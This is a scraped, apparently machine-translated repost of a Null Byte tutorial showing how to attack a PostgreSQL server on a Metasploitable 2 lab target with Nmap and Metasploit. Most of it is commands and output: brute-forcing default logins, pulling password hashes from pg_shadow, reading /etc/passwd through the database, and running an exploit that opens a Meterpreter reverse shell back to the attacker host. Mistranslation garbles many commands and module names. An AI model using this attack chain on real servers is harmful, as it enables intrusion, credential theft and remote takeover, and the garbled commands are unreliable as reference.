قالب وردپرس درنا توس
Home / Tips and Tricks / How to collect information about PostgreSQL databases with Metasploit «Null Byte :: WonderHowTo

How to collect information about PostgreSQL databases with Metasploit «Null Byte :: WonderHowTo



Attacking against databases has become one of the most popular and lucrative activities for hackers recently. New data breaches seem to be emerging every week, but even with all that attention, databases continue to be a major goal. All of these attacks must start somewhere, and we will explore a variety of methods to gather information about PostgreSQL databases with Metasploit.

PostgreSQL is an open source relational database management system (RDBMS) that uses the SQL language, along with many other functions to handle a variety of data workloads. PostgreSQL, originally developed for Unix, runs on all major operating systems and is the default database for macOS Server.

PostgreSQL is known for its scope, reliability, data integrity, strong architecture and robust feature set, including the popular PostGIS geographical database extender. It is also ACID compliant and has a dedicated open source code.

For the most part, PostgreSQL complies with SQL language standards, but some syntax and functions differ slightly. It is often used for heavy workloads, where concurrency and performance are a priority, and offer modern security and recovery capabilities that are important in business environments. Overall, PostgreSQL is a fantastic RDBMS that is both flexible and extendable.

Step 1
: Use an Nmap Scan

In this guide we use Metasploitable 2 as target and Kali Linux as the local machine. You can use the same or similar.

After configuring the test lab, we must determine if the PostgreSQL service is running on target. To do this, we can run an Nmap scan on port 5432, which is usually the default port for PostgreSQL. Use the -p flag to specify the port and -sV to enable version detection:

  ~ # nmap -sV 10.10.0.50 -p 5432

Start Nmap 7.80 (https://nmap.org) at 2020-05-10 11:41 CST
Nmap scan report for 10.10.0.50
The value is up (0.00064's latency).

PORT STATE SERVICE VERSION
5432 / tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
MAC Address: 00: 1D: 09: 55: B1: 3B (Dell)

Service detection is performed. Report incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 6.71 seconds 

We can see that the PostgreSQL service is open on target and runs versions 8.3.0 – 8.3.7.

On Amazon: Mastering PostgreSQL 12: Advanced Techniques to Build and Manage Scalable and Reliable PostgreSQL Database Applications, 3rd Edition

Step 2: Get Version Information

Metasploit has a number of modules that we can use to collect useful information about PostgreSQL databases. Fire it by typing msfconsole into the terminal.

  ~ # msfconsole

,,
/ 
((__--- ,,, ---__))
(_) O O (_) _________
 _ / | 
o_o  M S F | 
 _____ | *
||| WW |||
||| |||

= [ metasploit v5.0.87-dev                          ]
+ - - = [ 2006 exploits - 1096 auxiliary - 343 post       ]
+ - - = [ 562 payloads - 45 encoders - 10 nops            ]
+ - - = [ 7 evasion                                       ]

Metasploit tips: Tired of setting RHOSTS for modules? Try setting it globally with setg RHOSTS x.x.x.x

msf5> 

When loaded, we can use the search function to look for modules related to PostgreSQL:

  msf5> search postgre

Matching modules
================

# Name Publication Date Rank Check description
- ---- --------------- ---- ----- -----------
0 help / admin / http / manageengine_pmp_privesc 2014-11-08 normally Yes Manage Input Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
1 extra / admin / http / rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Unit Authentication Password Reset
2 extra / admin / postgres / postgres_readfile normal No PostgreSQL Server Generic Query
3 extra / admin / postgres / postgres_sql normal No PostgreSQL Server Generic Query
4 extra / analysis / crack_databases normal No password Cracker: databases
5 extra / analysis / jtr_postgres_fast normal No John the Ripper Postgres SQL Password Cracker
6 extra / scanner / postgres / postgres_dbname_flag_injection normal Yes PostgreSQL database name Command line Flag injection
7 extra / scanner / postgres / postgres_hashdump normal Yes Postgres Password Hashdump
8 extra / scanner / postgres / postgres_login normal Yes PostgreSQL login tool
9 extra / scanner / postgres / postgres_schemadump normal Yes Postgres Schedule Dump
10 extra / scanner / postgres / postgres_version normal Yes PostgreSQL version Probe
11 extra / server / capture / postgresql normal No authentication Capture: PostgreSQL
12 exploit / linux / postgres / postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux payload execution
13 exploit / multi / http / manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
14 exploit / multi / postgres / postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command technology
15 exploit / multi / postgres / postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution
16 exploit / windows / misc / manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote code execution
17 exploit / windows / postgres / postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows payload execution
18 post / linux / gather / enum_users_history normal No Linux Gather User History 

The first one we will cover will give us some information about the version that is running. It never hurts to double check as some exploits only work for certain versions. Load module with command use :

  msf5> use help / scanner / postgres / postgres_version 

Now let's look at the options to see the current settings:

  msf5 aids ( scanner / postgres / postgres_version)> alternative

Module options (extra / scanner / postgres / postgres_version):

Name Current setting Mandatory description
------------------- -------- -----------
DATABASE template1 yes Database to verify against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS yes Target host (s), CIDR identifier range or host file with syntax & # 39; file:  & # 39;
RPORT 5432 yes Target port
THREADS 1 yes Number of concurrent threads (max one per host)
USERNAME postgres yes The username to be verified as
VERBOSE false no Enable verbal output 

We can leave all the default values ​​at the moment, but we will need to set the option rhosts to the IP address of our target:

  msf5 extra (scanner / postgres) / postgres_version)> set rust 10.10.0.50

rhosts => 10.10.0.50 

Now we just have to run it; use the command run to start it:

  msf5 extra help (scanner / postgres / postgres_version)> run

[*] 10.10.0.50:5432 Postgres - Version PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4) (Post-Auth)
[*] Scanned 1 out of 1 hosts (100% complete)
[*] Execution of help module completed 

And we can see the version number is 8.3.1, which is a bit more specific than what Nmap returned.

Step 3: Brute-Force the Login

The next module we are looking at will try the brute-force login to the PostgreSQL database using a list of default names and passwords. Load it with the usage command:

  msf5> use help / scanner / postgres / postgres_login 

Let's take a look at these module options:

  msf5 extra (scanner / postgres / postgres_login)> options

Module options (extra / scanner / postgres / postgres_login):

Name Current setting Mandatory description
------------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DATABASE template1 yes Database to verify against
DB_ALL_CREDS false no Try each user / password pair stored in the current database
DB_ALL_PASS false no Add all passwords to the current database in the list
DB_ALL_USERS false no Add all users to the current database in the list
PASSWORD NO A specific password to verify with
PASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt no file containing password, one per line
Proxies no A format type proxy chain: host: port [,type:host:port][...]
     RETURN_ROWSET true no Set to true to see query result set
RHOSTS yes Target host (s), CIDR identifier range or host file with syntax & # 39; file:  & # 39;
RPORT 5432 yes Target port
STOP_ON_SUCCESS false yes Stop guessing when a reference works for a host
THREADS 1 yes Number of concurrent threads (max one per host)
USERNAME no A specific username to verify as
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt nr File containing (intermediate) users and passwords, one pair per row
USER_AS_PASS false no Try the username as a password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt no file containing users, one per row
VERBOSE true yes Whether or not you want to print the output for all attempts 

This has some more options we can move with, but currently the standards work. Just set the remote host option again, and we should be good to go:

  msf5 extra help (scanner / postgres / postgres_login)> set rust 10.10.0.50

rhosts => 10.10.0.50 

Now we can start the module:

  msf5 extra help (scanner / postgres / postgres_login)> run

[!] No active DB - Credential data not saved!
[-] 10.10.0.50:5432 - LOGIN FIELD :: @ template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FIELD :: tiger @ template1 (Error: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FOR :: postgres @ template1 (Error: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FIELD :: password @ mall1 (Error: invalid username or password)
[-] 10.10.0.50:5432 - LOGIN REALIZED :: admin @ template1 (Error: invalid username or password)
[-] 10.10.0.50:5432 - LOGIN LOGIN: postgres: @ template1 (Error: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FIELD: postgres: tiger @ template1 (Error: Invalid username or password)
[+] 10.10.0.50:5432 - Login successful: postgres: postgres @ template1
[-] 10.10.0.50:5432 - LOGIN FIELD: scott: @ template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FIELD: scott: tiger @ template1 (Error: invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FIELD: scott: postgres @ template1 (Error: invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FIELD: scott: password @ mall1 (Error: invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FIELD: scott: admin @ template1 (Error: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FIELD: admin: @ template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN LOGIN: admin: tiger @ template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN LOGIN: admin: postgres @ template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FIELD: admin: password @ mall1 (Error: invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FIELD: admin: admin @ mall1 (Error: invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FIELD: admin: admin @ mall1 (Error: invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FIELD: admin: password @ mall1 (Error: invalid username or password)
[*] Scanned 1 out of 1 hosts (100% complete)
[*] Execution of help module completed 

We can see it go through every username and password combination, most of which fail, but we have a successful login.

Step 4: Run SQL Queries

We can run SQL queries directly from another Metasploit module instead of logging directly into the database. Load module:

  msf5> use help / admin / postgres / postgres_sql 

And look at the options:

  msf5 extra (admin / postgres / postgres_sql)> options

Module options (extra / admin / postgres / postgres_sql):

Name Current setting Mandatory description
------------------- -------- -----------
DATABASE template1 yes Database to verify against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RETURN_ROWSET true no Set to true to see query sets
RHOSTS yes Target host (s), CIDR identifier range or host file with syntax & # 39; file:  & # 39;
RPORT 5432 yes Target port
SQL Select version () no SQL query to run
USERNAME postgres yes The username to be verified as
VERBOSE false no Enable verbate output 

Instead of setting the remote host option every time, we can use the command setg to set the option globally. This means that it will remain set when we switch to other modules unless we change it again.

  msf5 extra help (admin / postgres / postgres_sql)> setg rhosts 10.10.0.50

rhosts => 10.10.0.50 

The default query for this module is set to select database version – let's see what it looks like:

  msf5 extra help (admin / postgres / postgres_sql)> run

[*] Driving module against 10.10.0.50

Question text: & # 39; select version () & # 39;
==============================

version
-------
PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)

[*] Execution of help module completed 

But we can set this option to whatever valid SQL code we want. For example, the following query will return the username and password of the current user:

  SELECT username, passwd FROM pg_shadow; 

Let's set the alternative to this now:

  msf5 extra (admin / postgres / postgres_sql)> Set sql select username, passwd from pg_shadow

sql => select username, passwd from pg_shadow 

And run the module again:

  msf5 extra help (admin / postgres / postgres_sql)> run

[*] Driving module against 10.10.0.50

Question text: & # 39; select username, passwd from pg_shadow & # 39;
================================================== =

username passwd
------- ------
postgres md53175bce1d3201d16594cebf9d7eb3f9d

[*] Execution of auxiliary module completed 

Now we can see username and password hash for the current user.

Step 5: Dump the Hashes

Metasploit also has a module that will quickly dump all password hashes in the database for us. Upload it:

  msf5> use help / scanner / postgres / postgres_hashdump 

And see the options:

  msf5 extra (scanner / postgres / postgres_hashdump)> options

Module options (extra / scanner / postgres / postgres_hashdump):

Name Current setting Mandatory description
------------------- -------- -----------
DATABASE postgres yes Database to verify against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS 10.10.0.50 yes Target host (s), CIDR identifier range or host file with syntax & # 39; file:  & # 39;
RPORT 5432 yes Target port
THREADS 1 yes Number of concurrent threads (max one per host)
USERNAME postgres yes The username to be verified as 

Everything looks good at this point, and since we have already set remote values ​​before, we just need to run it:

  msf5 extra (scanner / postgres / postgres_hashdump)> run

[+] The issue seems to have been run successfully
[+] Postgres Server Hashes
======================

Username Hash
-------- ----
postgres md53175bce1d3201d16594cebf9d7eb3f9d

[*] Scanned 1 out of 1 hosts (100% complete)
[*] Execution of auxiliary module completed 

We can see the issue is run successfully and returns the password hash.

Step 6: Dump Schedule Info

Next module we will try to dump any schema information it can find about the database. This can be useful to get a broad view of all databases, tables and settings used. Load module:

  msf5> use help / scanner / postgres / postgres_schema dump 

And check the options:

  extra msf5 (scanner / postgres / postgres_schemadump)> options

Module options (extra / scanner / postgres / postgres_schema dump):

Name Current setting Mandatory description
------------------- -------- -----------
DATABASE postgres yes Database to verify against
DISPLAY_RESULTS true yes Display the results on the screen
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS 10.10.0.50 yes Target host (s), CIDR identifier range or host file with syntax & # 39; file:  & # 39;
RPORT 5432 yes Target port
THREADS 1 yes Number of concurrent threads (max one per host)
USERNAME postgres yes The username to be verified as 

We can leave the default values ​​and start the module:

  msf5 extra help (scanner / postgres / postgres_schemadump)> run

[+] Postgres SQL Server Schema
Host: 10.10.0.50
Port: 5432
====================

--- []

[*]   Scanned 1 out of 1 hosts (100% complete)
[*] Execution of auxiliary module completed 

We can see that it did not return anything, but it is worth a shot to try to collect data like this for invocation.

Step 7: Read the system files

We can also use Metasploit to read system files via the PostgreSQL database. Load module:

  msf5> use help / admin / postgres / postgres_readfile 

And look at the options:

  msf5 extra (admin / postgres / postgres_readfile)> options

Module options (extra / admin / postgres / postgres_readfile):

Name Current setting Mandatory description
------------------- -------- -----------
DATABASE template1 yes Database to verify against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RFILE / etc / passwd yes Remote files
RHOSTS 10.10.0.50 yes Target host (s), CIDR identifier range or host file with syntax & # 39; file:  & # 39;
RPORT 5432 yes Target port
USERNAME postgres yes The username to be verified as
VERBOSE false no Enable verbal output 

The default read file is set to / etc / passwd which will work for now. Let's kick it off:

  msf5 extra help (admin / postgres / postgres_readfile)> run

[*] Driving module against 10.10.0.50

Question text: & # 39; CREATE TEMP TABLE hoieZbLAeCQ (INPUT TEXT);
COPY hoieZbLAeCQ FROM & # 39; / etc / passwd & # 39 ;;
SELECT * FROM hoieZbLAeCQ & # 39;
================================================== ================================================== ================================

input
-----
backup: x: 34: 34: backup: / var / backups: / bin / sh
bin: x: 2: 2: bin: / bin: / bin / sh
bind: x: 105: 113 :: / var / cache / bind: / bin / false
daemon: x: 1: 1: daemon: / usr / sbin: / bin / sh
dhcp: x: 101: 102 :: / nonexistent: / bin / false
distccd: x: 111: 65534 :: /: / bin / false
ftp: x: 107: 65534 :: / home / ftp: / bin / false
game: x: 5: 60: Game: / usr / Game: / bin / sh
gnats: x: 41: 41: Gnats Bug-Reporting System (admin): / var / lib / gnats: / bin / sh
irc: x: 39: 39: ircd: / var / run / ircd: / bin / sh
smart: x: 103: 104 :: / home / clever: / bin / false
libuuid: x: 100: 101 :: / var / lib / libuuid: / bin / sh
list: x: 38: 38: Mailing List Manager: / var / list: / bin / sh
lp: x: 7: 7: lp: / var / spool / lpd: / bin / sh
mail: x: 8: 8: mail: / var / mail: / bin / sh
man: x: 6: 12: man: / var / cache / man: / bin / sh
msfadmin: x: 1000: 1000: msfadmin ,,,: / home / msfadmin: / bin / bash
mysql: x: 109: 118: MySQL Server ,,,: / var / lib / mysql: / bin / false
news: x: 9: 9: news: / var / spool / news: / bin / sh
none: x: 65534: 65534: none: / nonexistent: / bin / sh
postfix: x: 106: 115 :: / var / spool / postfix: / bin / false
postgres: x: 108: 117: PostgreSQL Administrator ,,,: / var / lib / postgresql: / bin / bash
proftpd: x: 113: 65534 :: / var / run / proftpd: / bin / false
proxy: x: 13: 13: proxy: / bin: / bin / sh
root: x: 0: 0: root: / root: / bin / bash
service: X: 1002: 1002: ,,,: / home / service: / bin / bash
sshd: x: 104: 65534 :: / var / run / sshd: / usr / sbin / nologin
statd: x: 114: 65534 :: / var / lib / nfs: / bin / false
sync: x: 4: 65534: sync: / bin: / bin / sync
sys: x: 3: 3: sys: / dev: / bin / sh
syslog: x: 102: 103 :: / home / syslog: / bin / false
telnetd: x: 112: 120 :: / non-existent: / bin / false
tomcat55: x: 110: 65534 :: / usr / share / tomcat5.5: / bin / false
user: x: 1001: 1001: just one user, 111 ,,: / home / user: / bin / bash
uucp: x: 10: 10: uucp: / var / spool / uucp: / bin / sh
www-data: x: 33: 33: www-data: / var / www: / bin / sh

root: x: 0: 0: root: / root: / bin / bash
daemon: x: 1: 1: daemon: / usr / sbin: / bin / sh
bin: x: 2: 2: bin: / bin: / bin / sh
sys: x: 3: 3: sys: / dev: / bin / sh
sync: x: 4: 65534: sync: / bin: / bin / sync
game: x: 5: 60: Game: / usr / Game: / bin / sh
man: x: 6: 12: man: / var / cache / man: / bin / sh
lp: x: 7: 7: lp: / var / spool / lpd: / bin / sh
mail: x: 8: 8: mail: / var / mail: / bin / sh
news: x: 9: 9: news: / var / spool / news: / bin / sh
uucp: x: 10: 10: uucp: / var / spool / uucp: / bin / sh
proxy: x: 13: 13: proxy: / bin: / bin / sh
www-data: x: 33: 33: www-data: / var / www: / bin / sh
backup: x: 34: 34: backup: / var / backups: / bin / sh
list: x: 38: 38: Mailing List Manager: / var / list: / bin / sh
irc: x: 39: 39: ircd: / var / run / ircd: / bin / sh
gnats: x: 41: 41: Gnats Bug-Reporting System (admin): / var / lib / gnats: / bin / sh
none: x: 65534: 65534: none: / nonexistent: / bin / sh
libuuid: x: 100: 101 :: / var / lib / libuuid: / bin / sh
dhcp: x: 101: 102 :: / nonexistent: / bin / false
syslog: x: 102: 103 :: / home / syslog: / bin / false
smart: x: 103: 104 :: / home / clever: / bin / false
sshd: x: 104: 65534 :: / var / run / sshd: / usr / sbin / nologin
msfadmin: x: 1000: 1000: msfadmin ,,,: / home / msfadmin: / bin / bash
bind: x: 105: 113 :: / var / cache / bind: / bin / false
postfix: x: 106: 115 :: / var / spool / postfix: / bin / false
ftp: x: 107: 65534 :: / home / ftp: / bin / false
postgres: x: 108: 117: PostgreSQL Administrator ,,,: / var / lib / postgresql: / bin / bash
mysql: x: 109: 118: MySQL Server ,,,: / var / lib / mysql: / bin / false
tomcat55: x: 110: 65534 :: / usr / share / tomcat5.5: / bin / false
distccd: x: 111: 65534 :: /: / bin / false
user: x: 1001: 1001: just one user, 111 ,,: / home / user: / bin / bash
service: X: 1002: 1002: ,,,: / home / service: / bin / bash
telnetd: x: 112: 120 :: / non-existent: / bin / false
proftpd: x: 113: 65534 :: / var / run / proftpd: / bin / false
statd: x: 114: 65534 :: / var / lib / nfs: / bin / false
[+] 10.10.0.50:5432 Postgres - / etc / passwd saved in /root/.msf4/loot/20191211120809_default_10.10.0.50_postgres.file_153011.txt
[*] Execution of auxiliary module completed 

We can see that it first creates a temporary table, copies the contents of the desired file and returns it to us on the screen. It also saves this as a tradeoff to use at a later convenience.

Let's try to read another file – maybe / etc / shadow this time. First set the option:

  msf5 extra help (admin / postgres / postgres_readfile)> set rfile / etc / shadow

rfile => / etc / shadow 

Then run the module:

  msf5 extra help (admin / postgres / postgres_readfile)> run

[*] Driving module against 10.10.0.50

[-] 10.10.0.50:5432 Postgres - Insufficient felt condition.
[*] Execution of auxiliary module completed 

We can see this time that it did not succeed because we do not have the necessary file permissions. But always worth a try.

Step 8: Submit a payload

The last module we will explore today is an exploit that will attempt to place and execute a payload on the target. First load the module:

  msf5> use exploit / linux / postgres / postgres_payload 

And see the alternatives:

  msf5 exploit (linux / postgres / postgres_payload)> alternatives

Module options (exploit / linux / postgres / postgres_payload):

Name Current setting Mandatory description
------------------- -------- -----------
DATABASE template1 yes Database to verify against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS 10.10.0.50 yes Target host (s), CIDR identifier range or host file with syntax & # 39; file:  & # 39;
RPORT 5432 yes Target port
USERNAME postgres yes The username to be verified as
VERBOSE false no Activate dictionary

Take advantage of goals:

ID name
- ----
0 Linux x86 

Everything looks good, but since this is an exploit we have to set a payload. Use the command show to see available payloads for this module:

  msf5 exploit (linux / postgres / postgres_payload)> show payload

Compatible payloads
===================

# Name Publication Date Rank Check description
- ---- --------------- ---- ----- -----------
0 generic / custom normal No custom payload
1 generic / debug_trap normal No Generic x86 Debug Trap
2 generic / shell_bind_tcp normal No generic command shell, Bind TCP Inline
3 generic / shell_reverse_tcp normal No generic command shell, reverse TCP inline
4 generic / tight_loop normal No Generic x86 Tight Loop
5 linux / x86 / chmod normal No Linux Chmod
6 linux / x86 / exec normal No Linux Execute Command
7 linux / x86 / meterpreter / bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
8 linux / x86 / meterpreter / bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID support (Linux x86)
9 linux / x86 / meterpreter / bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
10 linux / x86 / meterpreter / bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
11 linux / x86 / meterpreter / bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID support (Linux x86)
12 linux / x86 / meterpreter / reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6)
13 linux / x86 / meterpreter / reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager
14 linux / x86 / meterpreter / reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager
15 linux / x86 / meterpreter / reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager
16 linux / x86 / metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP
17 linux / x86 / metsvc_reverse_tcp normal No Linux Meter Preter Service, Reverse TCP Inline
18 linux / x86 / read_file normal No Linux read file
19 linux / x86 / shell / bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
20 linux / x86 / shell / bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
21 linux / x86 / shell / bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager
22 linux / x86 / shell / bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86)
23 linux / x86 / shell / bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
24 linux / x86 / shell / reverse_ipv6_tcp normal None Linux Command Shell, Reverse TCP Stager (IPv6)
25 linux / x86 / shell / reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager
26 linux / x86 / shell / reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
27 linux / x86 / shell / reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager
28 linux / x86 / shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6)
29 linux / x86 / shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
30 linux / x86 / shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
31 linux / x86 / shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
32 linux / x86 / shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6) 

Let & # 39; s use the popular Meterpreter reverse shell; use the set command to set the payload:

 msf5 exploit (linux / postgres / postgres_payload)> set payload linux / x86 / meterpreter / reverse_tcp

payload => linux / x86 / meterpreter / reverse_tcp 

We need to set the local host and local port options since this is a reverse shell. Set the lhost to the IP address of our local machine:

 msf5 exploit (linux / postgres / postgres_payload)> set lhost 10.10.0.1

lhost => 10.10.0.1 

And the lport to a port of your choosing:

 msf5 exploit (linux / postgres / postgres_payload)> set lport 4321

lport => 4321 

That should be everything we need, so let's kick it off:

 msf5 exploit (linux / postgres / postgres_payload)> run

[*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.50:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/FKXyvnhM.so, should be cleaned up automatically
[*] Sending stage (985320 bytes) to 10.10.0.50
[*] Meterpreter session 1 opened (10.10.0.1:4321 -> 10.10.0.50:37662) at 2020-05-10 12:18:23 -0600

meterpreter >

We can see it creates the handler, uploads the payload on the target, and finally, opens a session. We can now run commands like sysinfo to verify we have a shell on the target:

meterpreter > sysinfo

Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Wrapping Up

Today we learned about PostgreSQL databases and how to gather information on them to aid in recon. First, we ran an Nmap scan to verify the service was open on the target. Next, we covered a variety of modules for collecting information, including version, login credentials, and password hashes. Finally, we used a module to exploit PostgreSQL, and ultimately obtained a Meterpreter session on the target.

Want to start making money as a white hat hacker? Jump start your White-Hat Hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from Ethical Hacking Professionals.

Buy Now (96% off) >

Cover image by Tim van der Kuip/Unsplash

Source link